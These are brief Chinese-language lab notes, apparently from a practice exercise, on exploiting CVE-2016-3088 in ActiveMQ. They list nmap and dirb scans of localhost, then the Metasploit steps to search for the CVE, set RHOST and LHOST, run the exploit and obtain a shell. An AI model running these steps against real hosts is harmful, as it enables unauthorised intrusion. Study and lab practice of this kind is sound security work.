nmap -p 1-65535 -A localhost -oN billu.txt
nmap -T4 -A -v localhost
dirb https://localhost:61616
nmap 进行信息手收集指定端口会更好
不指定基本没啥有用信息
启动msfconsole
搜索漏洞CVE
cve-2016-3088 由于我们知道对应漏洞信息我们可以进行搜素CVEid
一般情况信息收集发现主机使用的OS 版本、server版本如Apache MySQL 等版本信息进行检查版信息
查看漏洞详细信息
使用该模块
use 0
使用show options显示CVE模块所需参数
show options
set RHOST 是目标主机的IP地址。
set LHOST 本机ip地址
进行exploit
获取shell
参考博客:
(183条消息) CVE-2016-3088漏洞利用_ter_ret的博客-CSDN博客